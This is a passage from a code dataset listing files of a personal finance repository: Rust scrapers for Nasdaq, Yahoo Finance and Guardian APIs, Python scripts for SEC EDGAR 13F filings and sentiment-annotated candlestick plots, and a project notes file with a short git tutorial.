\"camelCase\")]\npub struct TRStory {\n pub updated: i64,\n pub headline: String,\n pub image: String,\n pub reason: String,\n pub path: String,\n pub id: String,\n pub channel: ::serde_json::Value,\n}\n\nimpl TRStory {\n pub fn to_rec(&self) -> Vec<String> {\n return vec![\n self.id.to_string(),\n self.updated.to_string(),\n self.headline.to_string(),\n self.reason.to_string(),\n self.path.to_string(),\n ];\n }\n}\n" }, { "alpha_fraction": 0.46252331137657166, "alphanum_fraction": 0.474563330411911, "avg_line_length": 34.63142013549805, "blob_id": "d6538a413187f9a847b4f6698d6cfca6524217c4", "content_id": "df4c07ad5719e4797bffb82f246a593e8af1830d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 11794, "license_type": "no_license", "max_line_length": 161, "num_lines": 331, "path": "/finox/src/lib.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "pub mod cme;\npub mod headers;\npub mod keys;\npub mod nasdaq;\npub mod news;\npub mod roses;\npub mod sec;\npub mod yf;\n\nuse crate::nasdaq::realtime::RealtimeRoot;\nuse chrono::{DateTime, FixedOffset, Utc};\nuse futures::stream::StreamExt;\n//use 
percent_encoding::{utf8_percent_encode, NON_ALPHANUMERIC};\nuse std::{collections::HashMap, error::Error, fmt, fs, path::Path, thread, time::Duration};\n\npub trait HasRecs {\n fn to_recs(&self) -> Vec<Vec<String>>;\n}\n\npub trait HasRec {\n fn to_rec(&self) -> Vec<String>;\n}\n\npub const NYT_DELAY: Duration = Duration::from_millis(6000);\n\npub async fn fetch<'a, T: ?Sized>(urls: Vec<String>) -> Result<Vec<Vec<String>>, String>\nwhere\n for<'de> T: HasRecs + serde::Deserialize<'de> + 'a,\n{\n let fetches = futures::stream::iter(urls.into_iter().map(|url| async move {\n if let Ok(res) = reqwest::get(&url).await {\n //REMOVE SLEEP\n thread::sleep(Duration::from_millis(100));\n if let Ok(root) = res.json::<T>().await {\n return Some(root.to_recs());\n } else {\n println!(\"serialize err {}\", url.clone());\n return None;\n }\n }\n println!(\"response err: {}\", url.clone());\n return None;\n }))\n .buffer_unordered(16)\n .collect::<Vec<Option<Vec<Vec<String>>>>>()\n .await;\n let recs = fetches\n .into_iter()\n .flatten()\n .collect::<Vec<Vec<Vec<String>>>>()\n .into_iter()\n .flatten()\n .collect::<Vec<Vec<String>>>();\n //Ok(Box::new(fetches.into_iter().flatten().collect::<Vec<T>>()))\n Ok(recs)\n}\n\n// when endpoints dont grab a vec\npub async fn fetch_one<'a, T: ?Sized>(urls: Vec<String>) -> Vec<Option<T>>\nwhere\n for<'de> T: HasRec + serde::Deserialize<'de> + 'a,\n{\n let fetches = futures::stream::iter(urls.into_iter().map(|url| async move {\n if let Ok(res) = reqwest::get(&url.clone()).await {\n if let Ok(root) = res.json::<T>().await {\n return Some(root);\n }\n println!(\"serialized json wrong {}\", url.clone());\n return None;\n }\n println!(\"no good1\");\n return None;\n }))\n .buffer_unordered(16)\n .collect::<Vec<Option<T>>>()\n .await;\n return fetches;\n}\n\npub async fn fetch_strings(urls: Vec<String>) -> Vec<Option<sec::SecFormHeader>> {\n let fetches = futures::stream::iter(urls.into_iter().map(|url| async move {\n if let Ok(res) = reqwest::get(&url.clone()).await {\n if let Ok(root) = res.text().await {\n if let Some(header) = sec::sec_header(&root) {\n if let Some(recs) = sec::sec_13f(&root) {\n let realfn = url\n .clone()\n .split(\"/\")\n .map(|x| x.to_string())\n .collect::<Vec<String>>();\n\n let file_name = format!(\n \"../data/sec/13f/{}.csv\",\n realfn.last()?.split(\".\").collect::<Vec<_>>().first()?\n );\n\n let mut wtr = csv::Writer::from_path(file_name.clone()).unwrap();\n\n for rec in recs.iter() {\n wtr.serialize(rec).unwrap();\n }\n\n println!(\"{}: {:#?}\", file_name, recs.len());\n wtr.flush().unwrap();\n return Some(header);\n }\n }\n }\n println!(\"serialized text wrong {}\", url.clone());\n return None;\n }\n println!(\"no good1\");\n return None;\n }))\n .buffer_unordered(16)\n .collect::<Vec<Option<sec::SecFormHeader>>>()\n .await;\n return fetches;\n}\n\n//\npub async fn fetch_write<'a, T: ?Sized>(\n hm: HashMap<String, String>,\n relpath: &str,\n header: &[&str],\n) -> Result<Vec<String>, reqwest::Error>\nwhere\n for<'de> T: HasRecs + serde::Deserialize<'de> + 'a,\n{\n let fetches = futures::stream::iter(hm.into_iter().map(|pair| async move {\n if let Ok(res) = reqwest::get(&pair.1.clone()).await {\n //thread::sleep(Duration::from_millis(100));\n if let Ok(root) = res.json::<T>().await {\n let recs = root.to_recs();\n let file_name = format!(\"{}{}.csv\", relpath.clone(), pair.0);\n let fp = Path::new(&file_name);\n if fp.exists() == true {\n let f = fs::OpenOptions::new()\n .append(true)\n .open(fp)\n .expect(\"opening file prob\");\n 
roses::to_csv(f, recs.clone(), None).expect(\"csv error\");\n } else {\n let f = fs::OpenOptions::new()\n .write(true)\n .create_new(true)\n .open(fp)\n .expect(\"opening file prob\");\n roses::to_csv(f, recs.clone(), Some(header)).expect(\"csv error\");\n }\n println!(\"{}: {}\", pair.0, recs.len());\n return Some(pair.0);\n }\n println!(\"serialized json wrong {:#?}\", pair.clone());\n return None;\n }\n println!(\"res err\");\n return None;\n }))\n .buffer_unordered(16)\n .collect::<Vec<Option<String>>>()\n .await;\n //println(\"{:#?}\", fetches\n Ok(fetches.into_iter().flatten().collect::<Vec<String>>())\n}\n\npub async fn fetch_rt(\n hm: HashMap<Security, DateTime<FixedOffset>>,\n) -> HashMap<Security, DateTime<FixedOffset>> {\n let fetches = futures::stream::iter(hm.into_iter().map(|pair| async move {\n if let Ok(res) = reqwest::get(&pair.0.to_nasdaq_rt_url().unwrap()).await {\n if let Ok(root) = res.json::<RealtimeRoot>().await {\n if let (Some(recs), newt) = root.to_new_recs(pair.1) {\n let file_name = format!(\n \"../data/nasdaq/realtime-trades/{}.csv\",\n pair.0,\n //Utc::now().to_rfc3339()\n );\n let fp = Path::new(&file_name);\n if fp.exists() == true {\n let f = fs::OpenOptions::new()\n .append(true)\n .open(fp)\n .expect(\"opening file prob\");\n roses::to_csv(f, recs, None).expect(\"csv error\");\n } else {\n let f = fs::OpenOptions::new()\n .write(true)\n .create_new(true)\n .open(fp)\n .expect(\"opening file prob\");\n roses::to_csv(\n f,\n recs,\n Some(&crate::nasdaq::realtime::NDAQ_REALTIME_HEADER),\n )\n .expect(\"csv error\");\n }\n return (pair.0, newt);\n } else {\n return pair;\n }\n } else {\n println!(\"serialize err {:#?}\", pair.clone());\n return pair;\n }\n }\n println!(\"response err: {:#?}\", pair.clone());\n return pair;\n }))\n .buffer_unordered(16)\n .collect::<HashMap<Security, DateTime<FixedOffset>>>()\n .await;\n return fetches;\n}\n\n#[derive(Debug, Clone, PartialEq, Eq, Hash, serde_derive::Serialize, serde_derive::Deserialize)]\npub enum Security {\n Commodity(String),\n Stock(String), // ? 
might need special treatment, far more endpoints for these\n Currency(String),\n Etf(String),\n}\n\nimpl Security {\n pub fn to_nasdaq_url(&self, sfx: &str) -> String {\n // \"insider-trades\", historical \"option-chain\", \"chart\", \"info\", \"dividends\", realtime-trades\n let pre = \"quote\";\n match self {\n Security::Commodity(s) => garbo(pre, s, sfx, \"commodities\", \"\"),\n Security::Stock(s) => garbo(\n pre,\n s,\n sfx,\n \"stocks\",\n \"&todate=2025-11-30&fromdate=2020-05-19&limit=99999\",\n ),\n Security::Etf(s) => garbo(\n pre,\n s,\n sfx,\n \"etf\",\n \"&todate=2025-11-30&fromdate=2020-05-19&limit=99999\",\n ),\n Security::Currency(s) => garbo(pre, s, sfx, \"currencies\", \"\"),\n }\n }\n\n // only have stocks on rt\n pub fn to_nasdaq_rt_url(&self) -> Result<String, Box<dyn Error>> {\n match self {\n Security::Stock(s) => Ok(garbo(\"quote\", s, \"realtime-trades\", \"stocks\", \"&limit=100\")),\n _ => panic!(\"Nasdaq only has realtime stock quotes\".to_string()),\n }\n }\n\n pub fn to_yf(&self) -> String {\n match self {\n Security::Stock(s) | Security::Etf(s) => format!(\"https://query2.finance.yahoo.com/v8/finance/chart/{}?interval=1d&period1=0&period2=1590498425\", s),\n Security::Currency(s) => format!(\"https://query2.finance.yahoo.com/v8/finance/chart/{}=X?interval=1d&period1=0&period2=1590498425\", s),\n Security::Commodity(s) => format!(\"https://query2.finance.yahoo.com/v8/finance/chart/{}=F?interval=1d&period1=0&period2=1590498425\", s),\n //_ => panic!(\"others not supported\")\n }\n }\n}\n\nimpl fmt::Display for Security {\n fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {\n let mystr = match self {\n Security::Commodity(s) => s,\n Security::Stock(s) => s,\n Security::Currency(s) => s,\n Security::Etf(s) => s,\n };\n write!(f, \"{}\", mystr)\n }\n}\npub fn garbo(pre: &str, s: &str, sfx: &str, sfx2: &str, sfx3: &str) -> String {\n format!(\n \"https://api.nasdaq.com/api/{}/{}/{}?assetclass={}{}\",\n pre, s, sfx, sfx2, sfx3\n )\n}\n\n// fix and percent encoding\npub fn gen_secs(asset_class: &str) -> (Vec<Security>, &[&str]) {\n match asset_class {\n \"stocks\" => (\n roses::read_tickers(\"../ref_data/tickers_stocks.txt\")\n .iter()\n .map(|x| Security::Stock(x.to_string()))\n .collect::<Vec<Security>>(),\n &headers::YF_STOCKS,\n ),\n \"commodities\" => (\n roses::read_tickers(\"../ref_data/tickers_commodities.txt\")\n .iter()\n .map(|x| Security::Commodity(x.to_string()))\n //utf8_percent_encode(x, NON_ALPHANUMERIC).to_string()))\n .collect::<Vec<Security>>(),\n &headers::YF_COMMODITIES,\n ),\n \"currencies\" => (\n // prob broken, need to interlace the symbols\n roses::read_tickers(\"../ref_data/tickers_currencies.txt\")\n .iter()\n .map(|x| Security::Currency(x.to_string()))\n .collect::<Vec<Security>>(),\n &headers::YF_CURRENCIES,\n ),\n \"etf\" => (\n roses::read_tickers(\"../ref_data/tickers_stocks.txt\")\n .iter()\n .map(|x| Security::Etf(x.to_string()))\n .collect::<Vec<Security>>(),\n &headers::YF_STOCKS,\n ),\n\n _ => panic!(\"invalid asset class provided\"),\n }\n}\n\npub fn nls_to_dt(s: &str) -> Result<DateTime<FixedOffset>, chrono::ParseError> {\n let t = format!(\"{} {} +05:00\", Utc::now().format(\"%Y-%m-%d\"), s);\n return DateTime::parse_from_str(&t, \"%Y-%m-%d %H:%M:%S %z\");\n}\n\npub fn ndaq_url_to_ticker(url: String) -> String {\n let v: Vec<&str> = url.split(\"/\").collect(); // divs\n return format!(\"{}\", v[5]);\n}\n" }, { "alpha_fraction": 0.6399034857749939, "alphanum_fraction": 0.6412819027900696, "avg_line_length": 
27.73267364501953, "blob_id": "a0cc9cc03b77d3cca60eca5baa4098eab151ebc0", "content_id": "c3d2f96f4ad1291c9b64a172ffc31e7312836f69", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 2902, "license_type": "no_license", "max_line_length": 95, "num_lines": 101, "path": "/finox/src/nasdaq/insiders.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "use crate::nasdaq::gen;\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct InsidersRoot {\n pub data: Data,\n pub message: ::serde_json::Value,\n pub status: gen::Status,\n}\n\nimpl crate::HasRecs for InsidersRoot {\n fn to_recs(&self) -> Vec<Vec<String>> {\n return self.data\n .transaction_table.rows\n .iter()\n .map(|x| x.to_rec())\n .collect();\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Data {\n pub title: ::serde_json::Value,\n pub number_of_trades: NumberOfTrades,\n pub number_of_shares_traded: NumberOfSharesTraded,\n pub transaction_table: TransactionTable,\n pub filer_transaction_table: ::serde_json::Value,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct NumberOfTrades {\n pub headers: ::serde_json::Value,\n pub rows: Vec<Row>,\n}\n\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Row {\n pub insider_trade: String,\n pub months3: String,\n pub months12: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct NumberOfSharesTraded {\n pub headers: ::serde_json::Value,\n pub rows: Vec<Row>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct TransactionTable {\n pub headers: ::serde_json::Value,\n pub rows: Vec<TransactionRow>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct TransactionRow {\n pub insider: String,\n pub relation: String,\n pub last_date: String,\n pub transaction_type: String,\n pub own_type: String,\n pub shares_traded: String,\n pub last_price: String,\n pub shares_held: String,\n pub url: String,\n}\n\nimpl TransactionRow {\n pub fn to_rec(&self) -> Vec<String> {\n return vec![\n self.insider.to_string(),\n self.relation.to_string(),\n self.last_date.to_string(),\n self.transaction_type.to_string(),\n self.own_type.to_string(),\n self.shares_traded.to_string(),\n self.last_price.to_string(),\n self.shares_held.to_string(),\n self.url.to_string(),\n ];\n }\n}\n\npub const NDAQ_INSIDER_HEADER: [&'static str; 9] = [\n \"insider\",\n \"relation\",\n \"last_date\",\n \"transaction_type\",\n \"own_type\",\n \"shares_traded\",\n \"last_price\",\n \"shares_held\",\n \"url\",\n];\n" }, { "alpha_fraction": 0.44270405173301697, "alphanum_fraction": 0.4509480595588684, "avg_line_length": 32.69444274902344, "blob_id": "3577e7e0c0bb5cf6116e69544effe50b177a3ef0", "content_id": "a4d8ae0f8080f503aee2a6f320a983b9127cc1b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 1213, "license_type": 
"no_license", "max_line_length": 90, "num_lines": 36, "path": "/viz/src/web.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "extern crate tokio;\nuse async_std::task;\nuse finox::Security;\nuse tide;\n\nfn main() -> tide::Result<()> {\n task::block_on(async {\n let mut app = tide::new();\n //serde_json::Value::from(infos);\n //for info in infos.iter() {\n // println!(\"{:#?}\", json!(info));\n //}\n\n //let info_str = format!(\"{:#?}\", infos).to_string();\n //println!(\"{:#?}\", info_str);\n // let infos = finox::fetch_one::<finox::nasdaq::info::InfoRoot>(urls)\n // .await\n // .into_iter()\n // .flatten()\n // .collect::<Vec<finox::nasdaq::info::InfoRoot>>();\n //\n // let to_serve = serde_json::to_string(&infos.clone()).expect(\"fuck\");\n\n app.at(\"/infos\").get(|_| async {\n let filepath = \"../ref_data/tickers_stocks.txt\";\n let urls = roses::read_tickers(filepath)\n .iter()\n .map(|x| Security::Stock(x.to_string()).to_nasdaq_url(\"info\"))\n .collect::<Vec<String>>();\n\n Ok(serde_json::to_string(&urls.clone())?)\n });\n app.listen(\"127.0.0.1:8080\").await?;\n Ok(())\n })\n}\n" }, { "alpha_fraction": 0.5641361474990845, "alphanum_fraction": 0.5818063020706177, "avg_line_length": 27.960784912109375, "blob_id": "7a24848152de2c7de0d14f9ba693635d4805b7dd", "content_id": "0864e78efa815712781aacd4dde0cead6436a142", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4584, "license_type": "no_license", "max_line_length": 132, "num_lines": 153, "path": "/py/edgar.py", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "import requests as r\r\nimport bs4\r\nimport pandas as pd\r\n\r\nEXAMPLE_TABLE = \"https://www.sec.gov/Archives/edgar/data/1037389/000103738919000272/xslForm13F_X01/renaissance13Fq32019_holding.xml\"\r\n\r\nROOT = 'https://www.sec.gov'\r\n\r\n\r\ndef search_link(name: str, form_type:str='13F-HR', verbose:bool=False) -> str:\r\n \"\"\"\r\n constructs a link to the filings page for a company name and form type\r\n \"\"\"\r\n company = name.replace(' ', '+')\r\n ret = ROOT + '/cgi-bin/browse-edgar?action=getcompany' + '&company=' + company + '&type=' + form_type + '&count=100'\r\n if verbose: \r\n print(f'Grabbing: {ret}')\r\n return ret\r\n\r\n\r\ndef get_page(link: str, parser:str='html.parser') -> bs4.BeautifulSoup:\r\n return bs4.BeautifulSoup(r.get(link).text, 'html.parser')\r\n\r\n\r\ndef next_pages(page: bs4.BeautifulSoup) -> list:\r\n \"\"\"\r\n TODO: not being used as most companies do not have >100 13F filings, however, this needs to get fixed!\r\n\r\n \"\"\"\r\n pages = [page]\r\n next_page = page.find('span', {'id': 'next'})\r\n while next_page is not None:\r\n page = get_page(next_page.a['href'])\r\n pages.append(page)\r\n next_page = page.find('span', {'id': 'next'})\r\n\r\n return pages\r\n\r\n\r\ndef grab_docs_links(page: bs4.BeautifulSoup, output:str='dict'):\r\n \"\"\"\r\n given a bs4 page, find all of the links to filings and return either a list or dictionary.\r\n\r\n if output is dict, the keys are the filing dates and the values are links to the html data\r\n\r\n \"\"\"\r\n\r\n if output == 'dict':\r\n docs = {}\r\n elif output == 'list':\r\n docs = []\r\n\r\n all_links = page.find_all('a', {'id': 'documentsbutton'})\r\n # print(f'getting document links for {company_full_name} at {}')\r\n\r\n for l in all_links:\r\n cur_page = get_page(ROOT + l['href'])\r\n date = cur_page.find('div', {'class' : 'info'}).text\r\n cur_table = cur_page.find('table', 
{'class': 'tableFile'})\r\n links = cur_table.find_all('a')\r\n\r\n if len(links) < 4:\r\n continue\r\n \r\n html_link = ROOT + links[2]['href']\r\n\r\n if output == 'dict':\r\n docs[date] = html_link\r\n elif output == 'list':\r\n docs.append(html_link)\r\n return docs\r\n\r\n\r\ndef get_holding(link: str)-> pd.DataFrame:\r\n \"\"\"\r\n link is html formatted 13F-HR form link as in EXAMPLE_TABLE at start of this file\r\n \r\n \"\"\"\r\n p = get_page(link)\r\n df = get_holding_from_page(p)\r\n return df\r\n\r\n\r\ndef get_holding_from_page(page: bs4.BeautifulSoup, output='df') -> pd.DataFrame:\r\n \"\"\"\r\n given the bs4 page, uses pandas to parse the holdings table\r\n\r\n \"\"\"\r\n table = page.find('table', {'summary': 'Form 13F-NT Header Information'})\r\n\r\n if output == 'df':\r\n ret = clean_holding(pd.read_html(table.prettify())[0])\r\n\r\n return ret\r\n\r\n\r\ndef clean_holding(df: pd.DataFrame, convert:bool=False) -> pd.DataFrame:\r\n \"\"\"\r\n parses an html holdings page \r\n\r\n columns to convert: ['(x$1000)', 'PRN AMT', 'MANAGER', 'SOLE', 'SHARED', 'NONE']\r\n\r\n \"\"\"\r\n df.columns = df.iloc[2]\r\n df.drop([0, 1, 2], inplace=True)\r\n\r\n if convert:\r\n to_convert = ['(x$1000)', 'PRN AMT', 'MANAGER', 'SOLE', 'SHARED', 'NONE']\r\n df[to_convert] = df[to_convert].apply(pd.to_numeric, errors='ignore')\r\n\r\n return df\r\n\r\n\r\ndef company_history(name:str, form_type:str='13F-HR', verbose:bool=False)-> dict:\r\n \"\"\"\r\n date : df\r\n \"\"\"\r\n history = {}\r\n link = search_link(name, form_type=form_type)\r\n page = get_page(link)\r\n doc_links = grab_docs_links(page, output='dict')\r\n for date, doc_link in doc_links.items():\r\n print(f'date: {date}')\r\n df = get_holding(doc_link)\r\n history[date] = df\r\n return history\r\n\r\n\r\ndef main():\r\n \"\"\"\r\n 1. given list of companies, gather all of the CIKs using cik_lookup (might need to use selenium :( ))\r\n 2. for each CIK, gather links to all 13F-HR forms html formatting, txt link if html nonexistent\r\n 3. for each html page, create dataframe\r\n 4. 
dictionary of companies:\r\n \"search_term\" : [\r\n cik : [\r\n date : dataframe\r\n ]\r\n ]\r\n\r\n \"\"\"\r\n\r\n companies = ['Renaissance Technologies']\r\n # companies = ['Renaissance Technologies', 'Two Sigma Investments', 'Bridgewater Associates',\r\n # 'AQR Capital Management', 'Millennium Management', 'Elliott Management', 'BlackRock', 'Citadel LLC']\r\n data = {name: company_history(name) for name in companies}\r\n return data\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n data = main()\r\n print(data)\r\n" }, { "alpha_fraction": 0.566526472568512, "alphanum_fraction": 0.5775957703590393, "avg_line_length": 26.542682647705078, "blob_id": "794b6eeb6383804847d8cddf205c090e57e68f2a", "content_id": "c61416bc462548f26eb06453a967c0302606000b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4517, "license_type": "no_license", "max_line_length": 121, "num_lines": 164, "path": "/py/utils.py", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "import plotly.graph_objects as go\nimport bs4\nimport pandas as pd\nimport requests as r\nimport glob\nimport datetime\nimport matplotlib.pyplot as plt\n\nfrom functools import reduce\nfrom transformers import pipeline\nimport pandas as pd\n\nheaders = {\n 'User-Agent': 'My User Agent 1.0',\n}\n\ndef page(link: str, parser:str = 'html.parser') -> bs4.BeautifulSoup:\n \"\"\"\n\n \"\"\"\n p = bs4.BeautifulSoup(r.get(link, headers=headers).text, parser)\n return p\n\n\ndef get_dfs(link: str, fn=None) -> list:\n \"\"\"\n // fn only writes first, (most common)\n \"\"\"\n dfs = [pd.read_html(p.prettify()) for p in page(link).find_all('table')]\n if fn:\n dfs[0][0].to_csv(fn, index=False)\n return dfs\n\n\ndef sec_cik_listings(cik:int) -> pd.DataFrame:\n return get_dfs(f'https://www.sec.gov/Archives/edgar/data/{cik}/')\n\n\ndef sec_xml(cik:int, form='13'):\n link = f\"https://www.sec.gov/cgi-bin/browse-edgar?action=getcompany&CIK={cik}&type={form}%25&output=atom\"\n return [href.text for href in page(link, 'lxml').find_all('filing-href')]\n\n\ndef sp500_df() -> pd.DataFrame:\n return get_dfs('https://en.wikipedia.org/wiki/List_of_S%26P_500_companies')[0][0]\n\n\ndef bloomberg_commodities():\n root = 'https://www.bloomberg.com/markets/commodities'\n p = page(root)\n group = p.find('ul', {'class': 'group'})\n urls = [a['href'] for a in group.find_all('a')]\n dfs = []\n for url in urls:\n dfs.append(get_dfs(url))\n return dfs\n\n\ndef write_plots():\n dfs = getem()\n for df in dfs:\n df.plot(x='date_time', y=df.columns[1])\n print(df.columns[1])\n plt.savefig(f'{df.columns[1]}_intraday.png', dpi=300)\n\n\ndef convert_dts(dfs, colname):\n for df in dfs:\n df[colname] = pd.to_datetime(df[colname])\n return dfs\n\n\ndef col_to_txt(df, col: str, fn: str):\n df[[col]].to_csv(fn, index=False, sep='\\n', header=False)\n\n\ndef getem():\n fns = glob.glob(\n '/home/sippycups/programming/repos/sipfin/finox/data/**stock_intraday*.csv')\n print(fns)\n dfs = [pd.read_csv(fn) for fn in fns]\n dfs = convert_dts(dfs, 'date_time')\n return dfs\n\n\ndef merge_em():\n dfs = getem()\n df_merged = reduce(lambda left, right: pd.merge(left, right, on=['date_time'],\n how='outer'), dfs)\n return df_merged\n\n\ndef yf_com() -> pd.DataFrame:\n root = 'https://finance.yahoo.com/commodities'\n df = get_dfs(root)[0][0]\n return df\n\n\ndef candle_plot(tick: str):\n dt = datetime.date.today()\n root = \"~/sipfin/finox/\"\n pat = f\"{root}data/{tick}_7d*.csv\"\n path = glob.glob(pat)\n print(path)\n df = 
pd.read_csv(path[0])\n\n    df2 = pd.read_csv(root + \"ref_data/sa.csv\")\n    df2 = add_sentiments(df2, \"title\")\n    union_rows = df2[df2.slug == tick.lower()]\n    print(tick, union_rows)\n\n    fig = go.Figure(data=[go.Candlestick(x=df['t'],\n                                         open=df[f'o_{tick}:US'], high=df[f'h_{tick}:US'],\n                                         low=df[f'l_{tick}:US'], close=df[f'c_{tick}:US'])\n                          ])\n    shapes = []\n    annotes = []\n    i = 1\n    for index, row in union_rows.iterrows():\n        shapes.append(dict(\n            x0=row['publish_on'], x1=row['publish_on'], y0=0, y1=1, xref='x', yref='paper',\n            line_width=2))\n        annotes.append(dict(\n            x=row['publish_on'], y=i*0.1, xref='x', yref='paper',\n            showarrow=False, xanchor='left', text=row['title'])\n        )\n        i += 1\n    row = union_rows.iloc[0]\n    fig.update_layout(\n        title=f\"{tick}: {row.title}, {row['sentiment_label']}, {row['sentiment_score']}\",\n        yaxis_title=f'{tick} candlestick',\n        shapes=shapes,\n        annotations=annotes,\n    )\n\n    fig.show()\n\n\ndef add_sentiments(df: pd.DataFrame, col: str, label_col=\"sentiment_label\", score_col=\"sentiment_score\") -> pd.DataFrame:\n    nlp = pipeline('sentiment-analysis')\n    sentiments = [nlp(text)[0] for text in df[col]]\n\n    labels = [s['label'] for s in sentiments]\n    labels = pd.Series(labels, name=label_col)\n\n    scores = [s['score'] for s in sentiments]\n    scores = pd.Series(scores, name=score_col)\n\n    return pd.concat([df, labels, scores], axis=1)\n\n\nif __name__ == \"__main__\":\n    max_plots = 5\n\n    f = open(\"../finox/ref_data/intersect_sa_yf.txt\", \"r\")\n    intersects = f.read().splitlines()\n\n    for i, elt in enumerate(intersects):\n        # try: \n        candle_plot(elt)\n        # except:\n        #     continue\n        # if i >= max_plots:\n        #     break\n" }, { "alpha_fraction": 0.652980625629425, "alphanum_fraction": 0.6549546122550964, "avg_line_length": 29.890243530273438, "blob_id": "1abb8ef199fabbede15ce142a72c59fc9a7d17b4", "content_id": "94d24342c548eacaaf792af9fb5b0e69f9627046", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 2533, "license_type": "no_license", "max_line_length": 95, "num_lines": 82, "path": "/finox/src/news/guardian.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "use serde_json::Value;\nuse std::{collections::HashMap, time::Duration};\n\npub const GUARDIAN_DELAY: Duration = Duration::from_millis(100);\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct SectionsRoot {\n    pub response: SectionsResponse,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct SectionsResponse {\n    pub status: String,\n    pub user_tier: String,\n    pub total: i64,\n    pub results: Vec<SectionsResult>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct SectionsResult {\n    pub id: String,\n    pub web_title: String,\n    pub web_url: String,\n    pub api_url: String,\n    #[serde(flatten)]\n    extra: HashMap<String, Value>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct ArticleRoot {\n    pub response: ArticleResponse,\n}\n\nimpl crate::HasRecs for ArticleRoot {\n    fn to_recs(&self) -> Vec<Vec<String>> {\n        self.response.results.iter().map(|x| x.to_rec()).collect()\n    }\n}\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, 
serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct ArticleResponse {\n    pub results: Vec<ArticleResult>,\n    #[serde(flatten)]\n    extra: HashMap<String, Value>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct ArticleResult {\n    pub id: String,\n    #[serde(rename = \"type\")]\n    pub type_field: String,\n    pub section_id: String,\n    pub section_name: String,\n    pub web_publication_date: String,\n    pub web_title: String,\n    pub web_url: String,\n    pub api_url: String,\n    pub is_hosted: bool,\n    pub pillar_id: Option<String>,\n    pub pillar_name: Option<String>,\n}\n\nimpl ArticleResult {\n    pub fn to_rec(&self) -> Vec<String> {\n        return vec![\n            self.id.to_string(),\n            self.type_field.to_string(),\n            self.section_id.to_string(),\n            self.section_name.to_string(),\n            self.web_publication_date.to_string(),\n            self.web_title.to_string(),\n            self.api_url.to_string(),\n            self.is_hosted.to_string(),\n            self.pillar_id.clone().unwrap_or(\"\".to_string()),\n        ];\n    }\n}\n" }, { "alpha_fraction": 0.7290076613426208, "alphanum_fraction": 0.7340967059135437, "avg_line_length": 18.255813598632812, "blob_id": "debdcd47ceb4b44e4ee78fb659eb89a293732851", "content_id": "974dea569aeb61b5822fc8170b3b483d83af69a2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 786, "license_type": "no_license", "max_line_length": 65, "num_lines": 43, "path": "/notes.md", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "# Completed projects:\n* Scrapers: FRED, YF, 13fs, Nasdaq\n\n\n\n# Current Projects:\n* Set up Google Cloud: get scrapers running continuously\n\n* Build extremely simple equity model.\n* Build basic Alpaca papertrader, portfolio return analysis.\n* Refine equity model (gradually).\n\n* Build Risk Parity Package (as generalizable as possible - adam)\n\n\n\n# Long Term Projects:\nBuild macroeconomic models with FRED data\n\nAdd news/MLP\n\nThink harder about authorization/security\n\n\n# Basic Tutorials:\n## GitHub\n### Add to Git\nAdd filename, write commit message, push to forked repo\n```bash\ngit add filename\ngit commit -m \"message\"\ngit push\n```\n\nShorthand:\n```bash\ngit add . 
